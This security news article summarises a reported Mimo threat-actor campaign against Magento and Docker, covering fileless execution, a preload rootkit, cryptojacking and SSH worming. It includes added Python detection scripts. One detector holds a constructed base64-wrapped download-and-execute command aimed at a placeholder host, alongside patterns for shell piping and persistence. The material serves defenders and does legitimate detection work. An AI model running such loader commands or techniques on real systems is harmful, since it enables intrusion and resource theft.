The once Craft CMS-focused threat actor known as Mimo—or Mimo’lette—has resurfaced with new vigor, broadening its scope and evolving into a persistent adversary. In its latest campaign, detailed by the Datadog Security Research team, Mimo has shifted focus from Craft to the Magento CMS platform, while incorporating advanced persistence techniques, memory-resident payloads, and dual monetization strategies via cryptojacking and proxyjacking.
“Mimo’s shift to Magento—coupled with the introduction of persistence mechanisms and new evasion techniques—highlights a significant evolution in their tactics, techniques, and procedures (TTPs),” the report states.
Mimo’s latest compromise vector involves exploiting PHP-FPM vulnerabilities within Magento installations. Although the exact vulnerability remains undetermined, Datadog observed the attacker conducting multi-day operations to maintain access and install malicious tooling. This marks a strategic platform expansion from previous campaigns.
“This represents a significant expansion in targeting… Mimo possesses multiple exploit capabilities beyond previously observed adversarial tradecraft,” the report writes.
To ensure continued access, Mimo uses GSocket, a legitimate penetration testing tool. Through encrypted connections and TOR support, GSocket allows adversaries to bypass NAT/firewall restrictions, while its daemon mode ensures automatic recovery post-reboot.
Persistence is maintained using:
- SystemD service units
- Legacy rc.local scripts
- Crontab entries with disguised process names (e.g., [kswapd0], [watchdogd])
The malicious binary is stored as ‘defunct’ and executed under names mimicking kernel-managed threads.
Perhaps Mimo’s most advanced evasion technique involves fileless execution through the memfd_create() syscall. The syscall creates an anonymous file that exists only in memory and can be executed directly, allowing the malware to run without ever being written to disk.
“The memfd file descriptor naming convention used (memfd:[rcu_sched]) is particularly clever as it mimics legitimate kernel thread names,” the report explains.
Combined with a rootkit injected via /etc/ld.so.preload, this effectively hides processes, directories, and system calls from most monitoring tools.
Datadog’s analysis reveals a rotating infrastructure model, using staged command-and-control (C2) servers across operational phases. This rotation suggests strong operational security practices, likely leveraging compromised servers as stepping stones.
Mimo employs a dual monetization approach:
- XMRig cryptominer (UPX-packed) targets C3Pool to mine Monero
- IPRoyal’s hezb.x86_64 client converts victim bandwidth into profit
“Even if the cryptominer is detected and removed, the proxy component may remain unnoticed, ensuring continued revenue for the threat actor,” the report notes.
Mimo’s ambitions now include Docker infrastructure. The actor scans for misconfigured Docker APIs, spawning containers that retrieve and execute payloads using base64-encoded shell commands.
Example command:
This loader installs a Go-based, UPX-packed ELF binary as the primary payload—equipped with modular packages (files, cmd, exploit, cron) and SSH-based worming capabilities.
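The Docker container-create request is where the base64-wrapped loader described above becomes visible to a defender. The following is an added detection example, not code from Datadog's report or from the campaign: it takes the JSON body of a `POST /containers/create` call (the `Image`, `Cmd`, `Entrypoint` and `HostConfig` fields are real Docker API fields), decodes any base64 blob that is piped into `base64 -d`, and flags the download-and-execute and staging patterns the article attributes to the loader. The sample request, its image name and the inner command are constructed for the example.

```python
"""Added example: decode base64-wrapped shell handed to a new container and
flag download-and-execute indicators. Sample input is constructed."""
import base64
import binascii
import json
import re

# A run of base64 alphabet characters long enough to be a payload, not a flag.
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Only bother decoding when the command actually invokes a decoder.
DECODE_RE = re.compile(r"base64\s+(?:-d\b|--decode\b|-D\b)")
# Patterns checked against the outer command and every decoded layer.
EXEC_INDICATORS = [
    (re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"), "download piped to shell"),
    (re.compile(r"\bchmod\s+\+x\b"), "sets executable bit"),
    (re.compile(r"/dev/shm/"), "stages payload in /dev/shm"),
    (re.compile(r"/etc/ld\.so\.preload"), "touches ld.so.preload"),
    (re.compile(r"\b(?:crontab|systemctl\s+enable)\b"), "installs persistence"),
]

# Constructed inner command and request; the hostname is a placeholder.
INNER = "curl -fsSL http://loader.example.invalid/x.sh | sh; chmod +x /dev/shm/.p"
SAMPLE_REQUEST = json.dumps({
    "Image": "alpine:latest",
    "Cmd": ["sh", "-c", "echo " + base64.b64encode(INNER.encode()).decode()
            + " | base64 -d | sh"],
    "HostConfig": {"Privileged": True, "Binds": ["/:/mnt/host"]},
})
# Constructed benign request for comparison.
BENIGN_REQUEST = json.dumps({"Image": "nginx", "Cmd": ["nginx", "-g", "daemon off;"]})


def decode_blobs(command):
    """Return the plaintext of every base64 blob in `command` that decodes to text."""
    decoded = []
    if not DECODE_RE.search(command):
        return decoded
    for blob in B64_BLOB_RE.findall(command):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # a path or token that merely looks like base64
        if all(c.isprintable() or c in "\n\t" for c in text):
            decoded.append(text)
    return decoded


def analyze_container_create(request_json):
    """Summarise a container-create body: image, privilege, host mounts,
    decoded command layers and which indicators fired."""
    body = json.loads(request_json)
    host = body.get("HostConfig") or {}
    cmd = " ".join(body.get("Cmd") or [])
    if body.get("Entrypoint"):
        cmd = " ".join(body["Entrypoint"]) + " " + cmd
    decoded = decode_blobs(cmd)
    indicators = []
    for text in [cmd] + decoded:
        for pattern, label in EXEC_INDICATORS:
            if pattern.search(text) and label not in indicators:
                indicators.append(label)
    return {
        "image": body.get("Image"),
        "privileged": bool(host.get("Privileged")),
        "binds": host.get("Binds") or [],
        "decoded": decoded,
        "indicators": indicators,
    }


if __name__ == "__main__":
    print(json.dumps(analyze_container_create(SAMPLE_REQUEST), indent=2))
```

Run over the daemon's access log or an audit feed of API calls, a request that decodes to a download piped into a shell, asks for `Privileged`, or binds the host root is worth an alert on its own; a Docker API reachable over plain TCP without TLS client authentication is the misconfiguration the article says the actor scans for, and the decoder above only helps once you can see those requests.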
The malware attempts to propagate laterally by:
- Extracting SSH keys from known_hosts and config files
- Determining the host’s public IP by opening a connection to 8.8.8.8:80
- Brute-forcing SSH access to nearby hosts using hardcoded usernames like admin, ubuntu, dev, and ec2-user
The use of the ec2-user username suggests that Mimo intends to target AWS environments.
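The SSH spreading behaviour above leaves a characteristic trace in `sshd` authentication logs: a single source working through the worm's fixed account list, and in the worst case succeeding afterwards. The following is an added detection example, not code from Datadog's report or from the campaign; it parses standard `sshd` "Failed password" / "Accepted" lines and reports sources whose failures span the named accounts. The log lines are constructed for the example and use documentation address ranges.

```python
"""Added example: find the SSH account-list spraying pattern in sshd logs.
Log lines are constructed, not captured from any real host."""
import re
from collections import defaultdict

# Account names the report says the worm tries.
WORM_USERS = {"admin", "ubuntu", "dev", "ec2-user"}

# Standard sshd auth line shapes, e.g.
#   "Failed password for invalid user admin from 203.0.113.5 port 41022 ssh2"
#   "Accepted publickey for deploy from 198.51.100.7 port 50000 ssh2: ..."
AUTH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

SAMPLE_LOG = """\
Jul 10 12:00:01 web1 sshd[2211]: Failed password for invalid user admin from 203.0.113.5 port 41022 ssh2
Jul 10 12:00:02 web1 sshd[2213]: Failed password for ubuntu from 203.0.113.5 port 41023 ssh2
Jul 10 12:00:03 web1 sshd[2215]: Failed password for invalid user dev from 203.0.113.5 port 41024 ssh2
Jul 10 12:00:04 web1 sshd[2217]: Failed password for invalid user ec2-user from 203.0.113.5 port 41025 ssh2
Jul 10 12:00:05 web1 sshd[2219]: Accepted publickey for deploy from 198.51.100.7 port 50000 ssh2: ED25519 SHA256:placeholder
Jul 10 12:00:06 web1 sshd[2221]: Failed password for root from 198.51.100.9 port 50001 ssh2
Jul 10 12:00:07 web1 sshd[2223]: Accepted publickey for ubuntu from 203.0.113.5 port 41026 ssh2: ED25519 SHA256:placeholder
"""


def parse_auth(lines):
    """Yield one dict per recognised sshd auth event."""
    for line in lines:
        m = AUTH_RE.search(line)
        if m:
            yield m.groupdict()


def detect_ssh_worm(lines, min_users=3):
    """Return {src: summary} for sources whose failures cover at least
    `min_users` of the worm's account list. A later successful login from
    the same source raises the severity to critical."""
    per_src = defaultdict(lambda: {"failed_users": set(), "accepted": []})
    for ev in parse_auth(lines):
        state = per_src[ev["src"]]
        if ev["result"] == "Failed":
            state["failed_users"].add(ev["user"])
        else:
            state["accepted"].append((ev["user"], ev["method"]))
    report = {}
    for src, state in per_src.items():
        tried = state["failed_users"] & WORM_USERS
        if len(tried) >= min_users:
            report[src] = {
                "tried": sorted(tried),
                "succeeded": state["accepted"],
                "severity": "critical" if state["accepted"] else "high",
            }
    return report


if __name__ == "__main__":
    for src, summary in detect_ssh_worm(SAMPLE_LOG.splitlines()).items():
        print(src, summary)
```

Because the worm picks its targets from `known_hosts` and SSH config files on the host it already controls, the flagged source is usually a peer the victim legitimately talks to, so do not suppress internal or known sources in this rule; a key-based "Accepted" from such a peer right after the spray is the lateral move itself.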
Post-infection, the ELF binary leverages the /dev/shm tmpfs directory—writable even in read-only containers—to host its payload, executing it entirely in memory using forkexec(). The process name is randomly selected from a list of kernel thread names to enhance stealth.
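The persistence and evasion tells described earlier (a userland binary running under a kernel-thread name such as [kswapd0], a memfd-backed executable named memfd:[rcu_sched], a library injected through /etc/ld.so.preload) and the /dev/shm in-memory execution described just above can all be checked from the same /proc snapshot. The following is an added hunting example, not code from Datadog's report or from the campaign: it reads process records from /proc (or a constructed snapshot, used here so it runs offline) and flags each tell. It assumes a Linux /proc layout; the directory under /var/tmp in the sample is a constructed path.

```python
"""Added example: hunt a /proc-derived process snapshot for kernel-thread
masquerading, memfd-backed executables, payloads running from /dev/shm,
and a populated /etc/ld.so.preload. Assumes a Linux /proc layout."""
import os
import re

# Names the campaign is reported to borrow. Genuine kernel threads with these
# names exist on most hosts, so the name alone is not a signal.
KERNEL_THREAD_NAMES = {"kthreadd", "kswapd0", "watchdogd", "rcu_sched",
                       "ksoftirqd", "migration", "kworker"}
# readlink("/proc/<pid>/exe") reports memfd-backed images as "/memfd:<name>"
# and appends " (deleted)" once the backing inode is unlinked.
MEMFD_RE = re.compile(r"^/memfd:")

# Constructed snapshot (not real telemetry). exe is "" where readlink fails,
# which is exactly what real kernel threads look like.
SAMPLE_PROCS = [
    {"pid": 2,    "comm": "kthreadd",  "exe": "",                                  "ppid": 0},
    {"pid": 15,   "comm": "rcu_sched", "exe": "",                                  "ppid": 2},
    {"pid": 1201, "comm": "sshd",      "exe": "/usr/sbin/sshd",                    "ppid": 1},
    {"pid": 4410, "comm": "[kswapd0]", "exe": "/var/tmp/.x/defunct",               "ppid": 1},
    {"pid": 4422, "comm": "rcu_sched", "exe": "/memfd:[rcu_sched] (deleted)",      "ppid": 4410},
    {"pid": 4430, "comm": "watchdogd", "exe": "/dev/shm/.cache/payload (deleted)", "ppid": 4410},
]


def collect_procs():
    """Read the live /proc into the record shape used above (Linux only)."""
    procs = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            with open(f"/proc/{pid}/stat") as f:
                # comm (field 2) may contain spaces, so split after its closing
                # parenthesis; the field after the state letter is the ppid.
                ppid = int(f.read().rsplit(")", 1)[1].split()[1])
        except OSError:
            continue  # process exited while we were reading
        try:
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            exe = ""  # kernel threads (and zombies) have no exe link
        procs.append({"pid": pid, "comm": comm, "exe": exe, "ppid": ppid})
    return procs


def find_suspicious(procs):
    """Return (pid, reason) tuples for records matching the campaign's tells."""
    findings = []
    for p in procs:
        bare = p["comm"].strip("[]").split("/")[0]
        looks_kernel = p["comm"].startswith("[") or bare in KERNEL_THREAD_NAMES
        if looks_kernel and p["exe"]:
            # Real kernel threads have no executable image at all.
            findings.append((p["pid"], f"kernel-thread name {p['comm']!r} backed by {p['exe']}"))
        elif looks_kernel and p["ppid"] not in (0, 2):
            # Real kernel threads are children of pid 0 or of kthreadd (pid 2).
            findings.append((p["pid"], f"kernel-thread name {p['comm']!r} with ppid {p['ppid']}"))
        if MEMFD_RE.match(p["exe"]):
            findings.append((p["pid"], f"memfd-backed executable {p['exe']}"))
        if p["exe"].startswith("/dev/shm/"):
            findings.append((p["pid"], f"executable loaded from tmpfs {p['exe']}"))
    return findings


def parse_ld_preload(contents):
    """Return the shared objects listed in /etc/ld.so.preload text.
    On a clean host the file is absent or empty, so any entry deserves a look."""
    libs = []
    for line in contents.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            libs.extend(line.split())
    return libs


if __name__ == "__main__":
    for pid, reason in find_suspicious(SAMPLE_PROCS):
        print(pid, reason)
    try:
        with open("/etc/ld.so.preload") as f:
            print("ld.so.preload entries:", parse_ld_preload(f.read()))
    except OSError:
        print("no /etc/ld.so.preload")
```

Note that a preload rootkit that hooks `readdir` and friends can hide its own entries from a userland scanner like this one, which is the point of the ld.so.preload technique; the same checks run from an agent with its own static libc, from eBPF, or against a disk image are not subject to that hiding.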
The evolution of Mimo from CMS exploitation to cloud-native container attacks and multi-vector persistence paints a picture of an adversary who is not only financially motivated but increasingly sophisticated.
As Datadog warns, “This sophistication highlights the continuous development of Mimo’s evasion capabilities, indicating a persistent effort to bypass security measures and maintain multiple avenues of persistence while covering their tracks.”